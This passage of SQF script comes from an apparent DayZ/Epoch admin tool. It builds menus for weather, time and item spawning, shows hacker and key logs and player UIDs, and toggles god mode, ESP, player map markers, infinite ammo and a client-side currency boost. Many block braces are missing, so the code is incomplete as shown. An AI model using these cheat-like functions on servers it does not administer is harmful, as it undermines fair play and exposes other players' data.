    			if (_code == "MainMenu") exitWith {call admin_filllist};
    			if (_code == "uidLog") exitWith {call admin_filluLog};
    			if (_code == "Weather") exitWith {call admin_weather};
    			if (_code == "Time") exitWith {call admin_time};
    		if (inSub) then
    			call compile _code;
    			_isran = true;
    		if (_istoggle == "1") then
    			[] spawn _code;
    			[lbCurSel 2] call admin_tgfnc;
    			_isran = true;
    		if (_isplayer == "1") then
    			if ((lbCurSel 1) >= 0) then
    				[lbtext [1, (lbCurSel 1)]] spawn _code;
    				_isran = true;
    				hint "Select a player!";
    				_isran = true;
    		if ((_isplayer == "0") && !_isran && (typeName _code != "STRING")) then {[] spawn _code;};
    	adminmsg =
    		createDialog "RscDisplayPassword";
    		ctrlSetText [1001,"BroadCast Message Plugin"];
    		ctrlSetText [101,"Type Message Here..."];
    		ctrlshow [1002,false];
    		buttonSetAction [1,"tlmadminrq = [19, player, toArray(ctrlText 101)]; publicVariable ""tlmadminrq"";"];
    	adminskin =
    		if (isNil "adminskinz") then {adminskinz = 0;};
    		if (adminskinz == 0) then
    			_formatLine = "[dayz_playerUID,dayz_characterID,'%1'] call player_humanityMorph;
    			adminSkin_wardrobe = player addaction [(""<t color=""""#ff8810"""">"" + (""Wardrobe"") +""</t>""),""ca\modules\MP\data\scriptCommands\moveIn.sqf"",
    			""Driver (call adminSkin_helper);"",5,false,false,"""",""""];";
    			wardrobe =
    					["DayZ Clothing", [2], "#USER:WardrobeDayZ", -5, [["expression", ""]], "1", "1"],
    					["Custom Clothing", [3], "#USER:WardrobeCustom", -5, [["expression", ""]], "1", "1"],
    					["", [-1], "", -5, [["expression", ""]], "1", "0"],
    						["Exit", [13], "", -3, [["expression", ""]], "1", "1"]
    			WardrobeCustom =
    					["Rocket Uniform", [2],  "", -5, [["expression", format[_formatLine,"Rocket_DZ"]]], "1", "1"],
    					["Desert Rocket Uniform", [3],  "", -5, [["expression", format[_formatLine,"BAF_Soldier_Officer_DDPM"]]], "1", "1"],
    					["Desert Camo Clothing", [4],  "", -5, [["expression", format[_formatLine,"BAF_Soldier_L_DDPM"]]], "1", "1"],
    					["Desert Soldier Uniform", [5],  "", -5, [["expression", format[_formatLine,"BAF_Soldier_DDPM"]]], "1", "1"],
    					["Desert Green Uniform", [6],  "", -5, [["expression", format[_formatLine,"BAF_Soldier_MTP"]]], "1", "1"],
    					["US Soldier Uniform", [7],  "", -5, [["expression", format[_formatLine,"US_Soldier_EP1"]]], "1", "1"],
    					["Czech Soldier Uniform", [8],  "", -5, [["expression", format[_formatLine,"CZ_Soldier_DES_EP1"]]], "1", "1"],
    					["", [-1], "", -5, [["expression", ""]], "1", "0"],
    						["Exit", [13], "", -3, [["expression", ""]], "1", "1"]
    			WardrobeDayZ =
    					["Male Suvivor", [2],  "", -5, [["expression", format[_formatLine,"Survivor2_DZ"]]], "1", "1"],
    					["Female Suvivor", [3],  "", -5, [["expression", format[_formatLine,"SurvivorW2_DZ"]]], "1", "1"],
    					["Male Bandit", [4],  "", -5, [["expression", format[_formatLine,"Bandit1_DZ"]]], "1", "1"],
    					["Female Bandit", [5],  "", -5, [["expression", format[_formatLine,"BanditW1_DZ"]]], "1", "1"],
    					["Camo Clothing", [6],  "", -5, [["expression", format[_formatLine,"Camo1_DZ"]]], "1", "1"],
    					["Ghillie Suit", [7],  "", -5, [["expression", format[_formatLine,"Sniper1_DZ"]]], "1", "1"],
    					["Soldier Uniform", [8],  "", -5, [["expression", format[_formatLine,"Soldier1_DZ"]]], "1", "1"],
    					["", [-1], "", -5, [["expression", ""]], "1", "0"],
    						["Exit", [13], "", -3, [["expression", ""]], "1", "1"]
    			adminskinz = 1;
    			adminSkin_wardrobe = player addaction [("<t color=""#ff8810"">" + ("Wardrobe") +"</t>"),"ca\modules\MP\data\scriptCommands\moveIn.sqf",
    			"Driver (call adminSkin_helper);",5,false,false,"",""];
    			adminSkin_helper = {showCommandingMenu "#USER:wardrobe";};
    			player removeAction adminSkin_wardrobe;
    			adminskinz = 0;
    	adminZombieShield =
    		if (isNil "adminZombieShieldz") then {adminZombieShieldz = 0;};
    		if (adminZombieShieldz == 0) then
    			hint "Zombie shield On";
    			adminZombieShieldz = 1;
    			while {adminZombieShieldz == 1} do
    					//_x setDamage 1.1;
    					_x setPos [0,0,0];
    				} forEach ((position player) nearEntities ["zZombie_Base",10]);
    				sleep 0.8;
    			hint "Zombie shield Off";
    			adminZombieShieldz = 0;
    	adminVehicleSpeed =
    		if (isNil "adminvehicleSpeedz") then {adminvehicleSpeedz = 0;};
    		if (adminvehicleSpeedz == 0) then
    			hint "Speed upgrade loaded!";
    			waituntil {!isnull (finddisplay 46)};
    			adminvehicleSpeedy = (findDisplay 46) displayAddEventHandler ["KeyDown","_this select 1 call MY_KEYDOWN_FNC_xx1;false;"];
    			MY_KEYDOWN_FNC_xx1 = {
    				_vcl = vehicle player;
    				if(_vcl == player)exitwith{};
    				_nos = _vcl getvariable "nitro";
    				_supgrade = _vcl getvariable "supgrade";
    				if(isEngineOn _vcl) then
    					switch (_this) do {
    						case 17: {
    							if(isEngineOn _vcl and !isnil "_supgrade") then
    								_vcl SetVelocity [(velocity _vcl select 0) * 1.011, (velocity _vcl select 1) *1.011, (velocity _vcl select 2) * 0.99];
    							} else {
    								_vcl setvariable ["supgrade", 1];
    						case 42: {
    							if(isEngineOn _vcl and !isnil "_nos") then
    								_vcl setVelocity [(velocity _vcl select 0) * 1.01, (velocity _vcl select 1) * 1.01, (velocity _vcl select 2) * 0.99];
    							} else {
    								_vcl setvariable ["nitro", 1];
    			adminvehicleSpeedz = 1;
    			(findDisplay 46) displayRemoveEventHandler ["KeyDown",adminvehicleSpeedy];
    			adminvehicleSpeedz = 0;
    	admin_filllist =
    		inSub = false;
    		_ctrl = 2 call getControl;
    		lbclear _ctrl;
    		adminadd = [];
    		call admin_list;
    		for [{_num = 0}, {_num <= count(adminadd)-1}, {_num = _num+7}] do
    			_index = _ctrl lbAdd format["%1", adminadd select _num];
    			_togglable = adminadd select (_num+2);
    			_istitle = adminadd select (_num+3);
    			_issubmenu = adminadd select (_num+4);
    			_thcolor = adminadd select (_num+6);
    			if (count _thcolor == 0) then
    				_ctrl lbSetColor [(lbsize _ctrl)-1, [1, 1, 1, 1]];
    			} else {_ctrl lbSetColor [(lbsize _ctrl)-1, _thcolor];};
    			if (_togglable == "1") then
    				if (_index in admin_toggled) then
    					_ctrl lbSetColor [(lbsize _ctrl)-1, [0, 1, 0, 1]];
    				} else {_ctrl lbSetColor [(lbsize _ctrl)-1, [1, 0, 0, 1]];};
    			if (_istitle == "1") then {_ctrl lbSetColor [(lbsize _ctrl)-1, [0.0, 0.6, 1.0, 1.0]];};
    			if ((_issubmenu == "1") && (count _thcolor == 0)) then {_ctrl lbSetColor [(lbsize _ctrl)-1, [0.9, 0.44, 0, 1]];};
    	admin_fillplr =
    		while {!(isNull (findDisplay 3030))} do
    			_count = count playableUnits;
    			_ctrl = 1 call getControl;
    			lbclear _ctrl;
    				if (getPlayerUID _x != "") then
    					_ctrl lbAdd format ["%1", name _x];
    					_ctrl lbSetData [(lbsize _ctrl)-1, "1"];
    					_ctrl lbSetColor [(lbsize _ctrl)-1, [0.0, 0.6, 1.0, 1.0]];
    			} forEach (call fnc_allunits);
    			lbSort _ctrl;
    			sleep 15;
    	admin_fillveh =
    		inSub = true;
    		_ctrl = 2 call getControl;
    		lbclear _ctrl;
    		_spwx = "['%1'] call adminsveh;";
    		adminadd = [];
    		adminadd = adminadd + ["     Main Menu","MainMenu","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Hacker Log","hackerLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Key Log","keyLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     View PlayerUIDs","uidLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		_cfgvehicles = configFile >> "cfgVehicles";
    		for "_i" from 0 to (count _cfgvehicles)-1 do
    			_vehicle = _cfgvehicles select _i;
    			if (isClass _vehicle) then
    				_veh_type = configName _vehicle;
    				if ((getNumber (_vehicle >> "scope") == 2) && (getText (_vehicle >> "picture") != "") && (((_veh_type isKindOf "LandVehicle") or (_veh_type isKindOf "Air") or (_veh_type isKindOf "Boat"))) && !((_veh_type isKindOf "ParachuteBase") or (_veh_type isKindOf "BIS_Steerable_Parachute"))) then
    					adminadd = adminadd + ["     "+_veh_type,format[_spwx,_veh_type],"0","0","0","0",[]];
    		for [{_num = 0}, {_num <= count(adminadd)-1}, {_num = _num+7}] do
    			_index     = _ctrl lbAdd format ["%1",adminadd select _num];
    			_issubmenu = adminadd select (_num+4);
    			_thcolor   = adminadd select (_num+6);
    			if (count _thcolor == 0) then
    				_ctrl lbSetColor [(lbsize _ctrl)-1, [1, 1, 1, 1]];
    			} else {_ctrl lbSetColor [(lbsize _ctrl)-1, _thcolor];};
    	admin_fillobj =
    		inSub = true;
    		_ctrl = 2 call getControl;
    		lbclear _ctrl;
    		_spwx = "['%1'] call adminsobj;";
    		adminadd = [];
    		adminadd = adminadd + ["     Main Menu","MainMenu","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Hacker Log","hackerLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Key Log","keyLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     View PlayerUIDs","uidLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		_cfgobjects = configFile >> "cfgVehicles";
    		for "_i" from 0 to (count _cfgobjects)-1 do
    			_object = _cfgobjects select _i;
    			if (isClass _object) then
    				_obj_type = configName _object;
    				if ((getNumber (_object >> "scope") == 2) && (getText (_object >> "picture") != "") && !((_obj_type isKindOf "ParachuteBase") or (_obj_type isKindOf "BIS_Steerable_Parachute")) && (_obj_type isKindOf "Building")) then
    					adminadd = adminadd + ["     "+_obj_type,format[_spwx,_obj_type],"0","0","0","0",[]];
    		for [{_num = 0}, {_num <= count(adminadd)-1}, {_num = _num+7}] do
    			_index = _ctrl lbAdd format ["%1", adminadd select _num];
    			_issubmenu = adminadd select (_num+4);
    			_thcolor   = adminadd select (_num+6);
    			if (count _thcolor == 0) then
    				_ctrl lbSetColor [(lbsize _ctrl)-1, [1, 1, 1, 1]];
    			} else {_ctrl lbSetColor [(lbsize _ctrl)-1, _thcolor];};
    	admin_fillwpn =
    		inSub = true;
    		_ctrl = 2 call getControl;
    		lbclear _ctrl;
    		_spwx = "['%1'] spawn adminweapon;";
    		adminadd = [];
    		adminadd = adminadd + ["     Main Menu","MainMenu","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Hacker Log","hackerLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Key Log","keyLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     View PlayerUIDs","uidLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		_cfgweapons = configFile >> 'cfgWeapons';
    		for "_i" from 0 to (count _cfgweapons)-1 do
    			_weapon = _cfgweapons select _i;
    			if (isClass _weapon) then
    				_wpn_type = configName _weapon;
    				if ((getNumber (_weapon >> "scope") == 0) or (getNumber (_weapon >> "scope") == 2)) then
    					adminadd = adminadd + ["     "+_wpn_type,format[_spwx,_wpn_type],"0","0","0","0",[]];
    		for [{_num = 0}, {_num <= count(adminadd)-1}, {_num = _num+7}] do
    			_index     = _ctrl lbAdd format["%1", adminadd select _num];
    			_issubmenu = adminadd select (_num+4);
    			_thcolor   = adminadd select (_num+6);
    			if (count _thcolor == 0) then
    				_ctrl lbSetColor [(lbsize _ctrl)-1, [1, 1, 1, 1]];
    			} else {_ctrl lbSetColor [(lbsize _ctrl)-1, _thcolor];};
    	admin_fillhlog =
    		inSub = true;
    		_ctrl = 2 call getControl;
    		lbclear _ctrl;
    		adminadd = [];
    		adminadd = adminadd + ["     Main Menu","MainMenu","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Hacker Log","hackerLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Key Log","keyLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     View PlayerUIDs","uidLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		_num = if (count hackerLog > 100) then {(count hackerLog)-100;} else {0;};
    		for "_i" from (count hackerLog)-1 to _num step -1 do
    			adminadd = adminadd + (hackerLog select _i);
    		for [{_num = 0}, {_num <= count(adminadd)-1}, {_num = _num+7}] do
    			_index     = _ctrl lbAdd format["%1", adminadd select _num];
    			_issubmenu = adminadd select (_num+4);
    			_thcolor   = adminadd select (_num+6);
    			if (count _thcolor == 0) then
    				_ctrl lbSetColor [(lbsize _ctrl)-1, [1, 1, 1, 1]];
    			} else {_ctrl lbSetColor [(lbsize _ctrl)-1, _thcolor];};
    	admin_fillklog =
    		inSub = true;
    		_ctrl = 2 call getControl;
    		lbclear _ctrl;
    		adminadd = [];
    		adminadd = adminadd + ["     Main Menu","MainMenu","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Hacker Log","hackerLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Key Log","keyLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     View PlayerUIDs","uidLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		_num = if (count keyLog > 100) then {(count keyLog)-100;} else {0;};
    		for "_i" from (count keyLog)-1 to _num step -1 do
    			adminadd = adminadd + (keyLog select _i);
    		for [{_num = 0}, {_num <= count(adminadd)-1}, {_num = _num+7}] do
    			_index     = _ctrl lbAdd format["%1", adminadd select _num];
    			_issubmenu = adminadd select (_num+4);
    			_thcolor   = adminadd select (_num+6);
    			if (count _thcolor == 0) then
    				_ctrl lbSetColor [(lbsize _ctrl)-1, [1, 1, 1, 1]];
    			} else {_ctrl lbSetColor [(lbsize _ctrl)-1, _thcolor];};
    	admin_filluLog =
    		inSub = true;
    		_ctrl = 2 call getControl;
    		lbclear _ctrl;
    		adminadd = [];
    		adminadd = adminadd + ["     Main Menu","MainMenu","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Hacker Log","hackerLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Key Log","keyLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     View PlayerUIDs","uidLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    			if ( isPlayer _x ) then
    				_log = (name _x) + "     " + (getPlayerUID _x);    
    				adminadd = adminadd + ["     "+_log,"","0","1","0","0",[]];
    		} foreach playableUnits;
    		for [{_num = 0}, {_num <= count(adminadd)-1}, {_num = _num+7}] do
    			_index     = _ctrl lbAdd format["%1", adminadd select _num];
    			_issubmenu = adminadd select (_num+4);
    			_thcolor   = adminadd select (_num+6);
    			if (count _thcolor == 0) then
    				_ctrl lbSetColor [(lbsize _ctrl)-1, [1, 1, 1, 1]];
    			} else {_ctrl lbSetColor [(lbsize _ctrl)-1, _thcolor];};
    	admin_weather =
    		inSub = false;
    		_ctrl = 2 call getControl;
    		lbclear _ctrl;
    		adminadd = [];
    		adminadd = adminadd + ["     Main Menu","MainMenu","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Hacker Log","hackerLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Key Log","keyLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     View PlayerUIDs","uidLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["     View Distance ","","0","1","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["      1",{hint "Changing distance to 1";tlmadminrq = [17,player,1,1];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      500",{hint "Changing distance to 500";tlmadminrq = [17,player,1,500];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      1000",{hint "Changing distance to 1000";tlmadminrq = [17,player,1,1000];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      2000",{hint "Changing distance to 2000";tlmadminrq = [17,player,1,2000];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      3000",{hint "Changing distance to 3000";tlmadminrq = [17,player,1,3000];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["     Overcast ","","0","1","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["      Clear",{hint "Clear Weather";tlmadminrq = [17,player,2,0];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      Partly Sunny",{hint "Partly Sunny";tlmadminrq = [17,player,2,0.2];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      Cloudy",{hint "Cloudy";tlmadminrq = [17,player,2,0.4];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      Rain",{hint "Rain";tlmadminrq = [17,player,2,0.6];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      Heavy Rain",{hint "Heavy Rain";tlmadminrq = [17,player,2,0.8];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      Storm",{hint "Storm";tlmadminrq = [17,player,2,1];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["     Rain ","","0","1","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["      No Rain",{hint "No Rain";tlmadminrq = [17,player,3,0];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      Partly Rain",{hint "Partly Rain";tlmadminrq = [17,player,3,0.2];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      A Little Rain",{hint "A Little Rain";tlmadminrq = [17,player,3,0.4];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      Rain",{hint "Rain";tlmadminrq = [17,player,3,0.6];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      Heavy Rain",{hint "Heavy Rain";tlmadminrq = [17,player,3,0.8];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      Mega Rain",{hint "Mega Rain";tlmadminrq = [17,player,3,1];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		for [{_num = 0}, {_num <= count(adminadd)-1}, {_num = _num+7}] do
    			_index     = _ctrl lbAdd format["%1", adminadd select _num];
    			_issubmenu = adminadd select (_num+4);
    			_thcolor   = adminadd select (_num+6);
    			if (count _thcolor == 0) then
    				_ctrl lbSetColor [(lbsize _ctrl)-1, [1, 1, 1, 1]];
    			} else {_ctrl lbSetColor [(lbsize _ctrl)-1, _thcolor];};
    	admin_time =
    		inSub = false;
    		_ctrl = 2 call getControl;
    		lbclear _ctrl;
    		adminadd = [];
    		adminadd = adminadd + ["     Main Menu","MainMenu","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Hacker Log","hackerLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     Key Log","keyLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["     View PlayerUIDs","uidLog","0","0","1","0",[1,0.1,0.55,1]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["     Time Selection ","","0","1","0","0",[]];
    		adminadd = adminadd + ["","","0","1","0","0",[]];
    		adminadd = adminadd + ["      12 AM",{hint "Changing time to 12AM";tlmadminrq = [20,player,date,0];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      1 AM",{hint "Changing time to 1AM";tlmadminrq = [20,player,date,1];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      3 AM",{hint "Changing time to 3AM";tlmadminrq = [20,player,date,3];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      5 AM",{hint "Changing time to 5AM";tlmadminrq = [20,player,date,5];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      7 AM",{hint "Changing time to 7AM";tlmadminrq = [20,player,date,7];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      9 AM",{hint "Changing time to 9AM";tlmadminrq = [20,player,date,9];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      11 AM",{hint "Changing time to 11AM";tlmadminrq = [20,player,date,11];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      13 PM",{hint "Changing time to 13PM";tlmadminrq = [20,player,date,13];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      15 PM",{hint "Changing time to 15PM";tlmadminrq = [20,player,date,15];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      17 PM",{hint "Changing time to 17PM";tlmadminrq = [20,player,date,17];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      19 PM",{hint "Changing time to 19PM";tlmadminrq = [20,player,date,19];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      21 PM",{hint "Changing time to 21PM";tlmadminrq = [20,player,date,21];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		adminadd = adminadd + ["      23 PM",{hint "Changing time to 23PM";tlmadminrq = [20,player,date,23];publicVariable "tlmadminrq";},"0","0","0","0",[]];
    		for [{_num = 0}, {_num <= count(adminadd)-1}, {_num = _num+7}] do
    			_index     = _ctrl lbAdd format["%1", adminadd select _num];
    			_issubmenu = adminadd select (_num+4);
    			_thcolor   = adminadd select (_num+6);
    			if (count _thcolor == 0) then
    				_ctrl lbSetColor [(lbsize _ctrl)-1, [1, 1, 1, 1]];
    			} else {_ctrl lbSetColor [(lbsize _ctrl)-1, _thcolor];};
    	admin_init =
    		if (isNull (findDisplay 3030)) then
    			createDialog "RscConfigEditor_Main";
    			_ctrl = 3 call getControl;
    			_ctrl ctrlSetText "Admin Tool";
    			_ctrl ctrlSetTextColor [1, 0.5, 1, 1];
    			_ctrl = 2 call getControl;
    			_ctrl ctrlSetEventHandler ["LBDblClick", "call admin_dbclick;"];
    			call admin_filllist;
    			[] spawn admin_fillplr;
    	adminheal =
    			if (name _x == _this select 0) then
    				tlmadminrq = [5,player,_x];
    				publicVariable "tlmadminrq";
    				hint format ["Healing %1", _this select 0];
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	admin_addcrypto =
    	 EPOCH_playerCrypto = EPOCH_playerCrypto + 2500;
    	 EPOCH_playerEnergy = EPOCH_playerEnergy + 2500;
    	 publicVariable "tlmadminrq";
    	admin_Disconnect =
    	(finddisplay 46) closeDisplay 0;
    	publicVariable "tlmadminrq";
    	admin_aatp =
    		[] spawn
    			_tempTime = time;
    			time = "aatp";
    			sleep 3;
    			[_tempTime] spawn
    				_tempTime = (_this select 0) + 3;
    				while {true} do
    					time = _tempTime;
    					_tempTime = _tempTime + 1;
    					sleep 1;
    	adminrepair =
    		if (vehicle player != player) then
    			_vehicle = vehicle player;
    			_newFuel = 1;
    			_vehicle setdamage 0;
    			_vehicle setfuel 1;
    			_vehicle setvehicleammo 1;
    			PVDZ_veh_SetFuel = [_vehicle,_newFuel];
    			PVDZ_veh_SetFuel spawn local_setFuel;
    			publicVariable "PVDZ_veh_SetFuel";
    			hint format ["Repairing %1", getText (configFile >> 'CfgVehicles' >> (typeOf _vehicle) >> 'displayName')];
    		} else {hint "Not in a vehicle!"};
    	admincrate =
    		tlmadminrq = [6,player];
    		publicVariable "tlmadminrq";
    		hint "Spawning Box";
    	fnc_allunits = 
    		_array = [];
    		{ if (isPlayer _x and !isNull (group _x)) then {_array set [count _array, _x];}; } forEach entities "CAManBase";
    	adminmark =
    		adminpmark =
    			while {mark == 1} do
    				_entities = call fnc_allunits;
    				for "_i" from 0 to (count _entities)-1 do
    					deleteMarkerLocal ("adminpmark" + (str _i));
    					_pm = createMarkerLocal [("adminpmark" + (str _i)), getPos (_entities select _i)];
    					_pm setMarkerTypeLocal "mil_dot";
    					_pm setMarkerSizeLocal [0.8, 0.8];
    					_pm setMarkerTextLocal format ["%1", name (_entities select _i)];
    					_pm setMarkerColorLocal ("ColorBlue");
    				sleep 3;
    			_entities = call fnc_allunits;
    			for "_i" from 0 to (count _entities)-1 do {deleteMarkerLocal ("adminpmark" + (str _i));};
    		adminvmark =
    			while {mark == 1} do
    				_entities = ([6800, 9200, 0] nearEntities [["LandVehicle", "Air", "Ship"], 110000000]);
    				for "_i" from 0 to (count _entities)-1 do
    					deleteMarkerLocal ("adminvmark" + (str _i));
    					_vm = createMarkerLocal [("adminvmark" + (str _i)), getPos (_entities select _i)];
    					_vm setMarkerTypeLocal "mil_dot";
    					_vm setMarkerSizeLocal [0.8, 0.8];
    					_vm setMarkerTextLocal format ["%1", getText (configFile >> 'CfgVehicles' >> (typeof (_entities select _i)) >> 'displayName')];
    					_vm setMarkerColorLocal ("ColorBlack");
    				sleep 3;
    			_entities = ([6800, 9200, 0] nearEntities [["LandVehicle", "Air", "Ship"], 110000000]);
    			for "_i" from 0 to (count _entities)-1 do {deleteMarkerLocal ("adminvmark" + (str _i));};
    		adminMiscMark =
    			while {mark == 1} do
    				_entities = (allMissionObjects "tentStorage")+(allMissionObjects "UH1Wreck_DZ")+(allMissionObjects "UH60Wreck_DZ")
    				+(allMissionObjects "Mi8Wreck_DZ");
    				for "_i" from 0 to (count _entities)-1 do
    					deleteMarkerLocal ("adminMiscMark" + (str _i));
    					_vm = createMarkerLocal [("adminMiscMark" + (str _i)), getPos (_entities select _i)];
    					_vm setMarkerTypeLocal "mil_dot";
    					_vm setMarkerSizeLocal [0.8, 0.8];
    					_vm setMarkerTextLocal format ["%1", getText (configFile >> 'CfgVehicles' >> (typeof (_entities select _i)) >> 'displayName')];
    					_vm setMarkerColorLocal ("ColorOrange");
    				sleep 10;
    			_entities = (allMissionObjects "tentStorage")+(allMissionObjects "UH1Wreck_DZ")+(allMissionObjects "UH60Wreck_DZ")
    						+(allMissionObjects "Mi8Wreck_DZ");
    			for "_i" from 0 to (count _entities)-1 do {deleteMarkerLocal ("adminMiscMark" + (str _i));};
    		if (isNil "mark") then {mark = 0;};
    		if (mark == 0) then
    			mark = 1;
    			hint "2D Map Markers Enabled";
    			[] spawn adminpmark;
    			[] spawn adminvmark;
    			[] spawn adminMiscMark;
    			mark = 0;
    			hint "2D Map Markers Disabled";
    	adminesp =
    		if (isNil "adminxtags") then
    			adminxtags = 0;
    			onEachFrame {
    				if (adminxtags==1) then {
    						drawIcon3D ["\a3\ui_f\data\IGUI\Cfg\Radar\radar_ca.paa", [1,1,1,1], getPos _x, 1, 1, 45, name _x, 1, 0.05, "PuristaMedium"]; 
    					} forEach playableUnits;
    		if (adminxtags == 0) then
    			adminxtags = 1;
    			hint "ESP Enabled";
    			adminxtags = 0;
    			hint "ESP Disabled";
    	admingod =
    		if (isNil "gmdadmin") then {gmdadmin = 0;};
    		if (gmdadmin == 0) then
    			gmdadmin = 1;
    			_object = player;
    			player setUnitRecoilCoefficient 0;
    			player_zombieCheck = {};
    			fnc_usec_damageHandler = {};
    			fnc_usec_unconscious  = {};
    			_object allowDamage false;
    			_object removeAllEventHandlers "handleDamage";
    			_object addEventHandler ["handleDamage", {false}];
    			hint "God Enabled";
    			player setUnitRecoilCoefficient 1;
    			player_zombieCheck = compile preprocessFileLineNumbers "\z\addons\dayz_code\compile\player_zombieCheck.sqf";
    			fnc_usec_damageHandler = compile preprocessFileLineNumbers "\z\addons\dayz_code\compile\fn_damageHandler.sqf";
    			fnc_usec_unconscious = compile preprocessFileLineNumbers "\z\addons\dayz_code\compile\fn_unconscious.sqf";
    			player addEventHandler ["handleDamage", {true}];
    			player removeAllEventHandlers "handleDamage";
    			player allowDamage true;
    			gmdadmin = 0;
    			hint "God Disabled";
    	adminAmmo =
    		if (isNil "adminAmmoToggle") then {adminAmmoToggle = 0;};
    		if (adminAmmoToggle == 0) then
    			adminAmmoToggle = 1;
    			hint "Inf Ammo Enabled";
    			_obj = player;
    			_mags = getArray (configFile >> 'CfgWeapons' >> currentWeapon vehicle _obj >> 'magazines');
    			_mag = _mags select 0;
    			vehicle _obj addMagazine _mag;
    			systemChat format['%1 added %2 for %3',name _obj,_mag,currentWeapon vehicle _obj];
    			while {adminAmmoToggle==1} do
    				vehicle player setVehicleAmmo 0.99;
    				sleep 0.1;
    			adminAmmoToggle = 0;
